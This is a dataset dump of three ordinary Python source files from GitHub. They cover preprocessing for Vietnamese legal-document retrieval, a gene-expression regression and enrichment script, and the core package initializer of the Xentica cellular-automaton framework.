+{"seq_id":"73030843939","text":"import re\nimport math\nimport json\nimport pandas as pd\nimport string \n\n# common phrases in legal documents\nre_thuchientheo = re.compile(\n r\"((((được\\s)?thực hiện theo qu[iy] định tại\\s|hướng dẫn tại\\s|theo qu[iy] định tại\\s|(được\\s)?thực hiện theo\\s|theo qu[iy] định tại\\s|theo nội dung qu[yi] định tại\\s|quy[iy] định tại|theo\\s)(các\\s)?)?|tại\\s(các\\s)?)(khoản(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điều(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điểm\\s(([a-z]|đ)\\,\\s)*([a-z]|đ)\\b|chương(\\ssố)?\\s(\\d+\\,\\s)*\\d+)((\\s|\\,\\s|\\s\\,\\s|\\svà\\s)(khoản(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điều(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điểm\\s(([a-z]|đ)\\,\\s)*([a-z]|đ)\\b|chương(\\ssố)?\\s(\\d+\\,\\s)*\\d+))*(\\s(điều này|thông tư này|nghị quyết này|quyết định này|nghị định này|văn bản này|quyết định này))?\"\n)\nre_thongtuso = re.compile(\n r\"(thông tư liên tịch|thông tư|nghị quyết|quyết định|nghị định|văn bản|Thông tư liên tịch|Thông tư|Nghị quyết|Nghị định|Văn bản|Quyết định)\\s(số\\s)?(([a-z0-9]|đ|\\-)+\\/([a-z0-9]|đ|\\-|\\/)*)\"\n)\nre_ngay = re.compile(r\"ngày\\s\\d+\\/\\d+\\/\\d+\\b|ngày\\s\\d+tháng\\d+năm\\d+\")\nre_thang_nam = re.compile(r\"tháng\\s\\d+\\/\\d+|tháng\\s\\d+|năm\\s\\d+\")\nre_chuong = re.compile(\n r\"chương\\s(III|II|IV|IX|VIII|VII|VI|XIII|XII|XI|XIV|XIX|XVIII|XVII|XVI|XV|XX|V|X|I|XXIII|XXII|XXI|XXIV|XXVIII|XXVII|XXVI|XXV|XXIX|XXX)\\b\"\n)\n\n# common end phrases in questions\nEND_PHRASES = [\n \"có đúng không\",\n \"đúng không\",\n \"được không\",\n \"hay không\",\n \"được hiểu thế nào\",\n \"được quy định cụ thể là gì\",\n \"được quy định như thế nào\",\n \"được quy định thế nào\",\n \"được quy định như nào\",\n \"trong trường hợp như nào\",\n \"trong trường hợp như thế nào\",\n \"trong trường hợp nào\",\n \"trong những trường hợp nào\",\n \"được hiểu như thế nào\",\n \"được hiểu như nào\",\n \"như thế nào\",\n \"thế nào\",\n \"như nào\",\n \"là gì\",\n \"là ai\",\n \"là bao nhiêu\",\n \"bao nhiêu\",\n \"trước bao lâu\",\n \"là bao lâu\",\n \"bao lâu\",\n \"bao gồm gì\",\n \"không\",\n \"bao gồm những gì\",\n \"vào thời điểm nào\",\n \"gồm những giấy tờ gì\",\n \"những yêu cầu nào\",\n]\n\n# punctuations, characters, stop-words \npunc = \"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^`{|}~\"\"\" # noqa: W605\ntable = str.maketrans(\"\", \"\", punc)\n\npunctuation = [x for x in string.punctuation]\nnumber = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"]\nchars = [\"a\", \"b\", \"c\", \"d\", \"đ\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\"]\nstop_word = number + chars + [\"của\", \"và\", \"các\", \"có\", \"được\", \"theo\", \"tại\", \"trong\", \"về\", \n \"hoặc\", \"người\", \"này\", \"khoản\", \"cho\", \"không\", \"từ\", \"phải\", \n \"ngày\", \"việc\", \"sau\", \"để\", \"đến\", \"bộ\", \"với\", \"là\", \"năm\", \n \"khi\", \"số\", \"trên\", \"khác\", \"đã\", \"thì\", \"thuộc\", \"điểm\", \"đồng\",\n \"do\", \"một\", \"bị\", \"vào\", \"lại\", \"ở\", \"nếu\", \"làm\", \"đây\", \n \"như\", \"đó\", \"mà\", \"nơi\", \"”\", \"“\"]\nbm25_removed = punctuation + stop_word\n\n# defining sub-functions\n\ndef remove_dieu_number(text):\n '''\n This funtion removes the common legal phrases out from texts\n '''\n text = re_thuchientheo.sub(\" \", text)\n text = re_thongtuso.sub(\" \", text)\n text = re_ngay.sub(\" \", text)\n text = re_thang_nam.sub(\" \", text)\n text = re_chuong.sub(\" \", text)\n return \" \".join(text.split())\n\n\ndef remove_other_number_by_zero(text):\n '''\n This funtion replaces numeric characters in texts into 0 for easier handling\n '''\n for digit in [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n text = text.replace(digit, \"0\")\n return text\n\n\ndef remove_punct(text):\n '''\n This funtion replaces punctuations in texts for easier handling\n '''\n text = text.replace(\";\", \",\").replace(\":\", \".\").replace(\"“\", \" \").replace(\"”\", \" \")\n text = \"\".join(\n [\n c\n if c.isalpha() or c.isdigit() or c in [\" \", \",\", \"(\", \")\", \".\", \"/\", \"-\"]\n else \" \"\n for c in text\n ]\n )\n text = \" \".join(text.split())\n return text\n\ndef lower_or_keep(text):\n \"This funtion lower words but not for abbreviations\"\n lst = text.split(\" \")\n newlst = [x if x.isupper() else x.lower() for x in lst]\n return \" \".join(newlst)\n\ndef preprocess_all_title(article_title):\n \"\"\"\n Preprocess titles of documents\n \"\"\"\n article_title = lower_or_keep(article_title)\n lst = article_title.split()\n new_lst = []\n for i in range(len(lst)):\n if lst[i] == 'số' and i == len(lst)-1:\n new_lst.append(lst[i])\n elif lst[i] == 'số' and \"/\" in lst[i+1]:\n pass\n elif \"/\" in lst[i]:\n pass\n else:\n new_lst.append(lst[i])\n article_title = \" \".join(new_lst)\n article_title = remove_dieu_number(article_title)\n #article_title = remove_other_number_by_zero(article_title)\n article_title = remove_punct(article_title)\n article_title = article_title.replace(\"về\", \"\")\n if \"do\" in article_title and \"ban hành\" in article_title:\n idx = article_title.rfind(\"do\")\n article_title = article_title[:(idx-1)]\n \n re_head = re.compile(r\"(thông tư liên tịch|thông tư|nghị quyết|quyết định|nghị định|văn bản)\\s(quy định|hướng dẫn)?\")\n article_title = re_head.sub(\" \", article_title)\n article_title = article_title.replace(\" \", \" \")\n article_title = article_title.replace(\" \", \" \")\n return article_title.strip()\n\ndef preprocess_article_title(article_title):\n \"\"\"\n Preprocess titles of documents\n \"\"\"\n article_title = lower_or_keep(article_title)\n article_title = \" \".join(article_title.split()[2:]) # Dieu 1.\n article_title = remove_dieu_number(article_title)\n #article_title = remove_other_number_by_zero(article_title)\n article_title = remove_punct(article_title)\n return article_title\n \ndef preprocess_khoan(khoan):\n \"\"\"\n Perprocess parts in a legal documents\n \"\"\"\n khoan = lower_or_keep(khoan)\n khoan = khoan.replace(\"\\xa0\", \"\")\n matched = re.match(r\"^\\d+\\.(\\d+\\.?)?\\s\", khoan) # 1. 2.2. 2.2\n if matched is not None:\n khoan = khoan[matched.span()[1]:].strip()\n\n else:\n matched2 = re.match(r\"^[\\wđ]\\)\\s\", khoan)\n if matched2 is not None:\n khoan = khoan[matched2.span()[1]:].strip()\n\n khoan = remove_dieu_number(khoan)\n #khoan = khoan.replace(\"đ)\",\"\")\n khoan = re.sub(r\"[\\wđ]\\) \",\"\", khoan)\n khoan = re.sub(r\"[\\wđ]\\. \",\"\", khoan)\n khoan = re.sub(r\"\\d+\\.\\d+\\.\\d+\\. \", \"\", khoan)\n khoan = re.sub(r\"\\d+\\.\\d+\\. \", \"\", khoan)\n khoan = re.sub(r\"\\d+\\. \", \"\", khoan)\n #khoan = re.sub(r\"[0-9]\\. \", \"\", khoan)\n #khoan = remove_other_number_by_zero(khoan)\n khoan = remove_punct(khoan)\n khoan = khoan.replace(\". .\", \".\")\n khoan = khoan.replace(\"..\", \".\")\n khoan = khoan.replace(\", ,\", \",\")\n khoan = khoan.replace(\",,\", \",\")\n khoan = khoan.strip()\n return \" \".join(khoan.split())\n\n\ndef preprocess_question(q, remove_end_phrase=True):\n \"\"\"\n Preprocess questions\n \"\"\"\n q = lower_or_keep(q)\n q = remove_dieu_number(q)\n q = \"\".join([c if c.isalpha() or c.isdigit() or c == \" \" else \" \" for c in q])\n q = remove_punct(q)\n if remove_end_phrase:\n for phrase in END_PHRASES:\n if q.endswith(phrase):\n q = q[: -len(phrase)]\n break\n\n return q.strip()\n\n'''def tokenise(text, segmenter):\n \"\"\"\n Segment the texts with vncorenlp-segemnter\n \"\"\"\n result = segmenter.tokenize(text)\n rlt = \"\"\n for i in range(len(result)-1):\n rlt += \" \".join(result[i])\n rlt += \" \"\n rlt += \" \".join(result[len(result)-1])\n return rlt\n'''\ndef tokenise(text, f):\n \"\"\"\n Segment the texts with pyvi tokenizer\n \"\"\"\n return f(text)\n \ndef remove_stopword(w):\n \"Remove stopwords in texts\"\n return w not in stop_word\n\ndef bm25_process(text, f):\n \"\"\"\n Processing texts for bm25: remove all puntuations, lower all words\n \"\"\"\n text = tokenise(text, f)\n words = text.lower().split(\" \")\n result = [w for w in words if w not in bm25_removed]\n stripped = \" \".join(result)\n result = \" \".join(stripped.split(\" \"))\n return result\n\ndef length(sentence):\n \"Return the length in words of sentences\"\n return len(sentence.split())\n\ndef build_corpus(f, corpus_file, law_dict, scorpus_ids, head = False):\n \"\"\"\n Build a corpus-dataframe\n \"\"\"\n law_ids = []\n text_ids = []\n article_ids = []\n titles = []\n texts = []\n processed_texts = []\n tokenized_texts = []\n bm25texts = []\n lengths = []\n ids = []\n sub_ids = []\n count = 0\n\n with open (corpus_file, 'r') as input:\n data = json.load(input)\n \n for law in data:\n for article in law['articles']:\n ids.append(count)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_id = law['law_id'] + \"_\" + article['article_id']\n text_ids.append(text_id)\n \n titles.append(article['title'])\n texts.append(article['text'])\n \n title = preprocess_article_title(article[\"title\"])\n head = preprocess_all_title(law_dict[law['law_id']])\n \n cac_khoan = article[\"text\"].split(\"\\n\")\n khoan_clean = []\n for khoan in cac_khoan:\n khoan = preprocess_khoan(khoan)\n khoan_clean.append(khoan.strip())\n article_text = \" \".join(khoan_clean)\n if head:\n processed_text = head + \". \" + title + \". \" + article_text\n else:\n processed_text = title + \". \" + article_text + \". \" + head + \".\"\n processed_texts.append(processed_text)\n start_sub_id = scorpus_ids.index(count)\n try:\n end_sub_id = scorpus_ids.index(count+1)\n sub_ids.append([i for i in range(start_sub_id, end_sub_id)])\n except:\n sub_ids.append([i for i in range(start_sub_id, len(scorpus_ids))])\n \n try: \n tokenized_text = tokenise(processed_text, f)\n tokenized_texts.append(tokenized_text)\n lengths.append(length(tokenized_text))\n except:\n tokenized_text = tokenise(processed_text[:50000], f)\n tokenized_texts.append(tokenized_text)\n lengths.append(length(tokenized_text))\n bm25texts.append(bm25_process(processed_text, f))\n count += 1\n \n df = pd.DataFrame()\n df[\"id\"] = ids\n df[\"law_id\"] = law_ids\n df[\"article_id\"] = article_ids\n df[\"text_id\"] = text_ids\n df[\"title\"] = titles\n df[\"text\"] = texts\n df[\"processed_text\"] = processed_texts\n df[\"sub_id\"] = sub_ids\n df[\"tokenized_text\"] = tokenized_texts\n df[\"bm25text\"] = bm25texts\n df[\"len\"] = lengths\n \n return df\n\ndef create_sliding_window(tokenized_text, size=200, overlap=64):\n \"\"\"\n Create list of windows for a text\n \"\"\"\n sentences = tokenized_text.split(\".\")\n words = tokenized_text.split(\" \")\n title = sentences[0]\n words = [w for w in words if len(w) >0]\n actual_size = size - overlap\n \n windows = []\n n_windows = math.ceil(len(words)/actual_size)\n for i in range(n_windows):\n windows.append(\" \".join(words[i*actual_size:i*actual_size + size]))\n for i in range(1, n_windows):\n if not windows[i].startswith(\".\"):\n windows[i] = title + \". \" + windows[i]\n else:\n windows[i] = title + windows[i]\n return windows\n\ndef build_short_corpus(f, corpus_file, law_dict, head=False, size=200, overlap=64):\n \"\"\"\n Build a corpus-dataframe\n \"\"\"\n ids = []\n law_ids = []\n text_ids = []\n article_ids = []\n titles = []\n texts = []\n processed_texts = []\n sub_ids = []\n tokenized_texts = []\n bm25texts = []\n lengths = []\n\n with open (corpus_file, 'r') as input:\n data = json.load(input)\n idx = 0\n sub_idx = 0\n for law in data:\n for article in law['articles']:\n text_id = law['law_id'] + \"_\" + article['article_id']\n title = preprocess_article_title(article[\"title\"])\n head = preprocess_all_title(law_dict[law['law_id']])\n cac_khoan = article[\"text\"].split(\"\\n\")\n khoan_clean = []\n for khoan in cac_khoan:\n khoan = preprocess_khoan(khoan)\n khoan_clean.append(khoan.strip())\n article_text = \" \".join(khoan_clean)\n if head:\n processed_text = head + \". \" + title + \". \" + article_text\n else:\n processed_text = title + \". \" + article_text + \". \" + head + \".\"\n try: \n tokenized_text = tokenise(processed_text, f)\n tokenized_len = length(tokenized_text)\n if tokenized_len <= size + 10:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(tokenized_text)\n lengths.append(tokenized_len)\n bm25texts.append(bm25_process(processed_text, f))\n sub_idx +=1\n else:\n windows = create_sliding_window(tokenized_text, size=224, overlap=64)\n for window in windows:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(window)\n lengths.append(length(window))\n bm25texts.append(bm25_process(window, f)) \n sub_idx +=1\n except:\n actual_size = 50000 - overlap\n big_windows = []\n n_big_windows = math.ceil(len(processed_text)/actual_size)\n for i in range(n_big_windows):\n big_windows.append(\"\".join(processed_text[i*actual_size:i*actual_size + size]))\n for big_window in big_windows:\n tokenized_text = tokenise(big_window, f)\n tokenized_len = length(tokenized_text)\n if tokenized_len > size + 10:\n windows = create_sliding_window(tokenized_text, size=224, overlap=64)\n for window in windows:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(window)\n lengths.append(length(window))\n bm25texts.append(bm25_process(window, f)) \n sub_idx +=1\n else:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(tokenized_text)\n lengths.append(tokenized_len)\n bm25texts.append(bm25_process(processed_text, f))\n sub_idx +=1\n \n idx += 1\n \n df = pd.DataFrame()\n df[\"id\"] = ids\n df[\"law_id\"] = law_ids\n df[\"article_id\"] = article_ids\n df[\"text_id\"] = text_ids\n df[\"title\"] = titles\n df[\"text\"] = texts\n df[\"processed_text\"] = processed_texts\n df[\"sub_id\"] = sub_ids\n df[\"tokenized_text\"] = tokenized_texts\n df[\"bm25text\"] = bm25texts\n df[\"len\"] = lengths\n \n return df\n\ndef build_qa(f, df, qa_file, split = False):\n \"\"\"\n Build a question-answer dataframe\n \"\"\"\n text_ids = df[\"text_id\"].tolist()\n titles = df[\"title\"].tolist()\n texts = df[\"text\"].tolist()\n lengths = df[\"len\"].tolist()\n sub_ids = df[\"sub_id\"].tolist()\n q_texts = []\n q_processed_texts = []\n q_tokenized_texts = []\n q_bm25texts = []\n q_lens = []\n no_ans = []\n ans_ids = []\n ans_text_ids = []\n ans_titles = []\n ans_texts = []\n ans_lens = []\n ans_sub_ids = []\n with open (qa_file, 'r') as input:\n data = json.load(input)\n \n if not split:\n for item in data['items']:\n question = item[\"question\"]\n q_texts.append(question)\n q_processed_text = preprocess_question(question, remove_end_phrase=False)\n q_processed_texts.append(q_processed_text)\n q_tokenized_text = tokenise(q_processed_text, f)\n q_tokenized_texts.append(q_tokenized_text)\n q_bm25texts.append(bm25_process(q_processed_text, f))\n q_lens.append(length(q_tokenized_text))\n ans_text_id = \"\"\n ans_id = \"\"\n ans_title = \"\"\n ans_text = \"\"\n ans_len = \"\"\n ans_count = 0\n ans_sub_id = []\n for i in range(len(item['relevant_articles'])):\n ans_count += 1\n atext_id = item['relevant_articles'][i]['law_id'] + \"_\" + item['relevant_articles'][i]['article_id']\n a_id = text_ids.index(atext_id)\n ans_text_id += atext_id\n ans_id += str(a_id)\n ans_title += titles[a_id]\n ans_text += texts[a_id]\n ans_len += str(lengths[a_id])\n sub_id = sub_ids[a_id]\n ans_sub_id += sub_id\n \n if i < len(item[\"relevant_articles\"]) - 1:\n ans_text_id += \", \"\n ans_id += \", \"\n ans_title += \", \"\n ans_text += \", \"\n ans_len += \", \"\n \n no_ans.append(ans_count)\n ans_text_ids.append(ans_text_id)\n ans_ids.append(ans_id)\n ans_titles.append(ans_title)\n ans_texts.append(ans_text)\n ans_lens.append(ans_len)\n ans_sub_ids.append(ans_sub_id)\n else:\n for item in data['items']:\n question = item[\"question\"]\n for article in item['relevant_articles']:\n q_texts.append(question)\n q_processed_text = preprocess_question(question, remove_end_phrase=False)\n q_processed_texts.append(q_processed_text)\n q_tokenized_text = tokenise(q_processed_text, f)\n q_tokenized_texts.append(q_tokenized_text)\n q_bm25texts.append(bm25_process(q_processed_text, f))\n q_lens.append(length(q_tokenized_text)) \n ans_text_id = article['law_id'] + \"_\" + article['article_id']\n ans_text_ids.append(ans_text_id)\n a_id = text_ids.index(ans_text_id)\n ans_ids.append(a_id)\n ans_titles.append(titles[a_id])\n ans_texts.append(texts[a_id])\n ans_lens.append(lengths[a_id])\n ans_sub_ids.append(sub_ids[a_id])\n \n \n df = pd.DataFrame()\n df[\"question\"] = q_texts\n df[\"processed_question\"] = q_processed_texts\n df[\"tokenized_question\"] = q_tokenized_texts\n df[\"bm25_question\"] = q_bm25texts\n df[\"ques_len\"] = q_lens\n if not split:\n df['no_ans'] = no_ans\n df[\"ans_text_id\"] = ans_text_ids\n df[\"ans_id\"] = ans_ids\n df[\"ans_title\"] = ans_titles\n df[\"ans_text\"] = ans_texts\n df[\"ans_len\"] = ans_lens\n df[\"ans_sub_id\"] = ans_sub_ids\n \n return df\n\ndef build_biencoder_data(dqa_split, bm25, set_ques, no_hneg, no_search):\n \"\"\"\n Build train, val, test, dataframe used for biencoder training\n \"\"\"\n qa_ids = []\n neg_ids = []\n search_ids = []\n q_texts = dqa_split['question'].tolist()\n q_bm25texts = dqa_split['bm25_question'].tolist()\n count = 0\n ans_ids = dqa_split['ans_id'].tolist()\n ids = [i for i in range(bm25.corpus_size)]\n for i in range(len(q_texts)):\n if q_texts[i] in set_ques:\n qa_ids.append(i)\n q_bm25 = q_bm25texts[i].split(\" \")\n bm25_ids = bm25.get_top_n(q_bm25, ids, n=no_search)\n if ans_ids[i] in bm25_ids:\n count += 1\n \n neg = bm25_ids[:(no_hneg+1)]\n if ans_ids[i] in neg:\n neg.remove(ans_ids[i])\n \n neg = neg[:no_hneg]\n neg_ids.append(neg)\n search_ids.append(bm25_ids)\n print(count/len(qa_ids)) \n df = dqa_split.loc[qa_ids]\n df['neg_ids'] = neg_ids\n df['search_ids'] = search_ids\n return df\n\ndef build_short_data(df, dcorpus, limited_length = 234):\n \"\"\"\n Build short data\n \"\"\"\n ids = [i for i in range(len(df)) if dcorpus['len'][df['ans_id'][i]] <= limited_length]\n dshort = df.loc[ids].copy(deep= True).reset_index(drop=True)\n return dshort\n\ndef build_general_data(dqa, bm25, set_ques, no_hneg, no_search):\n \"\"\"\n Build general train, test, val dataframe\n \"\"\"\n qa_ids = []\n neg_ids = []\n search_ids = []\n q_texts = dqa['question'].tolist()\n q_bm25texts = dqa['bm25_question'].tolist()\n ans_ids = dqa['ans_id'].tolist()\n ids = [i for i in range(bm25.corpus_size)]\n count = 0\n \n for i in range(len(q_texts)):\n if q_texts[i] in set_ques:\n qa_ids.append(i)\n q_bm25 = q_bm25texts[i].split(\" \")\n ans_id = [int(x) for x in ans_ids[i].split(\", \")]\n bm25_ids = bm25.get_top_n(q_bm25, ids, n= no_search)\n search_ids.append(bm25_ids)\n \n for a_id in ans_id:\n if a_id in bm25_ids:\n bm25_ids.remove(a_id)\n neg_id = bm25_ids[:no_hneg]\n neg_ids.append(neg_id)\n if len(bm25_ids) == (no_search - len(ans_id)):\n count += 1 \n \n df = dqa.loc[qa_ids]\n df['neg_ids'] = neg_ids\n df['search_ids'] = search_ids\n print(count/len(qa_ids))\n return df","repo_name":"coangquang/legal_retrieval","sub_path":"src/dpr/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":23463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"72290021541","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 29 16:36:09 2020\r\n\r\n@author: LilyHeAsamiko\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn import preprocessing\r\nfrom scipy import stats\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n#regression on TF\r\ndataset = pd.read_csv(r'/Users/he/Downloads/WiML-master/MAdata_DGinMCout.txt',sep='\\t', header = 0)\r\norigindata = np.exp(dataset)\r\ndataset1 = pd.read_csv(r'/Users/he/Downloads/WiML-master/raw_data_DGinMCout.tsv',sep='\\t', header = 0)\r\nfadata = pd.read_csv(r'/Users/he/Downloads/WiML-master/Alignment_for_family_PTHR11679_SF35.txt',sep='\\t', header = 0)\r\n\r\n#X = origindata\r\n#X.iloc[0:25,0] = dataset1.iloc[0:25,5]\r\n#X.iloc[0:25,1] = dataset1.iloc[25:50,5]\r\n#X.iloc[0:25,2] = dataset1.iloc[50:75,5]\r\nX= np.zeros((np.shape(dataset)))\r\nX[0:25,0] = dataset1.iloc[0:25,5]\r\nX[0:25,1] = dataset1.iloc[25:50,5]\r\nX[0:25,2] = dataset1.iloc[50:75,5]\r\n\r\nN,c = np.shape(origindata)\r\n#compare V1: dg_v, V2: dg_c\r\nbeta = np.dot(X.T,origindata)/N\r\nbeta = np.array(beta)\r\nbeta0 = beta\r\nsteps = 100\r\nbtemp = 0.1\r\ndb = 0.1\r\nlse = np.ones(np.shape(origindata))*10**5\r\nres = np.zeros((c,steps))\r\n#regression\r\nfor b in range(c):\r\n for s in range(steps):\r\n# temp = btemp*X.iloc[:,b]\r\n# temp = np.unique((np.array(origindata.iloc[:,b]).reshape(N,1)-temp.reshape(N,1)-np.random.normal(0,1,N).reshape(N,1)))**2\r\n# temp = np.array(btemp*X[:,b])\r\n# temp = (np.array(origindata.iloc[:,b])-temp-np.random.normal(0,1,N).T)**2\r\n e = np.random.normal(0,1,N).T\r\n temp = (np.array(origindata.iloc[:,b])-np.array(btemp*X[:,b])-e)**2\r\n temp[np.isnan(temp)]=0\r\n# if sum(temp.reshape(N,1) - lse.reshape(N,1))<0:\r\n if sum(temp - lse[:,b])<0:\r\n beta[b,b] = btemp\r\n btemp += db\r\n lse[:,b] = temp \r\n res[b,s] = np.sqrt(sum(lse[:,b])/N)\r\n else:\r\n btemp = (btemp +db)/2\r\n e = np.random.normal(0,1,N).T\r\n temp= (np.array(origindata.iloc[:,b])-np.array(btemp*X[:,b])-e)**2\r\n if sum(temp - lse[:,b])<0:\r\n beta[b,b] = btemp\r\n btemp += db\r\n lse[:,b] = temp \r\n res[b,s] = np.sqrt(sum(lse[:,b])/N)\r\n else:\r\n res[b,s] = np.sqrt(res[b,s-1]/N)\r\n # temp[np.isnan(temp)]=0\r\n# res[b,s] = np.mean(res[b,0:s-1]/s)\r\nC = np.corrcoef(X,X)\r\nplt.pcolor(C[0:25,0:25])\r\nplt.title('correlation of three cells TF')\r\nLD = np.zeros((np.shape(origindata)))\r\n#LD score:\r\nfor i in range(c):\r\n LD[:,i] = origindata.iloc[:,i]**2+origindata.iloc[:,i]*origindata.iloc[:,np.mod(i+1,3)]+origindata.iloc[:,i]*origindata.iloc[:,np.mod(i+2,3)]\r\nplt.pcolor(LD)\r\nplt.title('LD_Score of three cells TF')\r\n \r\nplt.scatter(origindata, np.dot(X,beta))\r\nplt.title('three cells TF regression')\r\n\r\n\r\n#Compare enrichment of fa dataset(as the sequence is not complete but only alignment data, there we compare enrichment only on family fasta sequence)\r\nStr_Tnig = np.array(fadata.iloc[0:125],dtype = str)\r\nStr_Onil = np.array(fadata.iloc[127:252],dtype = str)\r\n#Common allele:\r\nrows = np.shape(Str_Onil)[0] \r\ncols = len(str(Str_Onil[0,:]))\r\nco = np.zeros((rows, cols))\r\ncE = 0\r\nS = ['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V']\r\nfor i in range(np.shape(Str_Onil)[0]):\r\n co[i,:] = str(Str_Onil[i,:])==str(Str_Tnig[i,:])\r\n cE += sum(co[i,:]>0)\r\nM = rows*cols \r\nEnrichment_Tnig_Onil = np.zeros((rows, 2,2))\r\nTnigID = np.zeros((rows, cols,len(S)))\r\nOnilID = TnigID \r\nfor i in range(rows):\r\n for s in range(len(S)):\r\n# TnigID[i,:,s] = str(Str_Tnig[i,:])[~co[i,:]]==S[s]\r\n# OnilID[i,:,s] = str(Str_Onil[i,~co[i,:]]==S[s]\r\n# OnilID[i,:,s] = str(Str_Onil[i,:])[~co[i,:]]==S[s]\r\n #temp1 = str(Str_Tnig[i,])[:]\r\n TnigID[i,:,s] = str(Str_Tnig[i,]).find(S[s])\r\n #print(len(temp1))\r\n #temp2 = str(Str_Onil[i,])[:]\r\n #print(len(temp2))\r\n OnilID[i,:,s] = str(Str_Onil[i,]).find(S[s])\r\n #tempTid = TnigID[i,:,s]>=0\r\n #tempOid = OnilID[i,:,s]>=0\r\n #tempc = np.corrcoef(TnigID[i,tempTid,s],OnilID[i,tempOid,s])\r\n #tempc[np.isnan(tempc)] = 0\r\n #Enrichment_Tnig_Onil[i,s,:,:] = tempc\r\n tempTid = TnigID[i,:,:]>=0\r\n tempOid = OnilID[i,:,:]>=0\r\n tempc = np.corrcoef(TnigID[i,tempTid],OnilID[i,tempOid])\r\n tempc[np.isnan(tempc)] = 0\r\n Enrichment_Tnig_Onil[i,:,:] = tempc\r\n\r\n#fig = plt.figure()\r\n#ax = fig.add_subplot(111,projection = '3d')\r\n#ax.scatter(np.linspace(0,2,10),np.linspace(0,2,10),Enrichment_Tnig_Onil.T)\r\nEnrichment1 = sum(Enrichment_Tnig_Onil[Enrichment_Tnig_Onil>0]**2)/cE/((sum(Enrichment_Tnig_Onil[Enrichment_Tnig_Onil<=0]**2))/(rows*cols-cE)+1)","repo_name":"LilyHeAsamiko/neurocomputation","sub_path":"Regulatory elements inferenced by TF/LD.py","file_name":"LD.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"8125726812","text":"# -*- coding: utf-8 -*-\n\"\"\"\nXentica core functionality is available via modules from this package.\n\nIn addition, you may use ``core`` package as a shortcut to the main\nclasses of the framework.\n\n- **Base classes**\n - ``core.CellularAutomaton`` →\n :class:`xentica.core.base.CellularAutomaton`\n - ``core.Experiment`` →\n :class:`xentica.core.experiment.Experiment`\n\n- **Lattices**\n - ``core.OrthogonalLattice`` →\n :class:`xentica.core.topology.lattice.OrthogonalLattice`\n\n- **Neighborhoods**\n - ``core.MooreNeighborhood`` →\n :class:`xentica.core.topology.neighborhood.MooreNeighborhood`\n - ``core.VonNeumannNeighborhood`` →\n :class:`xentica.core.topology.neighborhood.VonNeumannNeighborhood`\n\n- **Borders**\n - ``core.TorusBorder`` →\n :class:`xentica.core.topology.border.TorusBorder`\n - ``core.StaticBorder`` →\n :class:`xentica.core.topology.border.StaticBorder`\n\n- **Properties**\n - ``core.IntegerProperty`` →\n :class:`xentica.core.properties.IntegerProperty`\n - ``core.FloatProperty`` →\n :class:`xentica.core.properties.FloatProperty`\n - ``core.TotalisticRuleProperty`` →\n :class:`xentica.core.properties.TotalisticRuleProperty`\n - ``core.RandomProperty`` →\n :class:`xentica.core.properties.RandomProperty`\n\n- **Parameters**\n - ``core.Parameter`` →\n :class:`xentica.core.parameters.Parameter`\n\n- **Variables**\n - ``core.IntegerVariable`` →\n :class:`xentica.core.variables.IntegerVariable`\n - ``core.FloatVariable`` →\n :class:`xentica.core.variables.FloatVariable`\n\nThe classes listed above are all you need to build CA models and\nexperiments with Xentica, unless you are planning to implement custom\ncore features like new lattices, borders, etc.\n\n\"\"\"\nfrom xentica.core.base import CellularAutomaton\nfrom xentica.core.properties import (\n IntegerProperty,\n FloatProperty,\n TotalisticRuleProperty,\n RandomProperty,\n)\nfrom xentica.core.variables import (\n IntegerVariable, FloatVariable,\n)\nfrom xentica.core.parameters import (\n Parameter,\n)\nfrom xentica.core.topology.lattice import (\n OrthogonalLattice,\n)\nfrom xentica.core.topology.neighborhood import (\n MooreNeighborhood, VonNeumannNeighborhood\n)\nfrom xentica.core.topology.border import (\n TorusBorder, StaticBorder,\n)\nfrom xentica.core.experiment import Experiment\n\n__all__ = [\n 'CellularAutomaton',\n 'IntegerProperty',\n 'FloatProperty',\n 'TotalisticRuleProperty',\n 'RandomProperty',\n 'Parameter',\n 'IntegerVariable',\n 'FloatVariable',\n 'OrthogonalLattice',\n 'MooreNeighborhood',\n 'VonNeumannNeighborhood',\n 'TorusBorder',\n 'StaticBorder',\n 'Experiment',\n]\n","repo_name":"a5kin/xentica","sub_path":"xentica/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"35"}
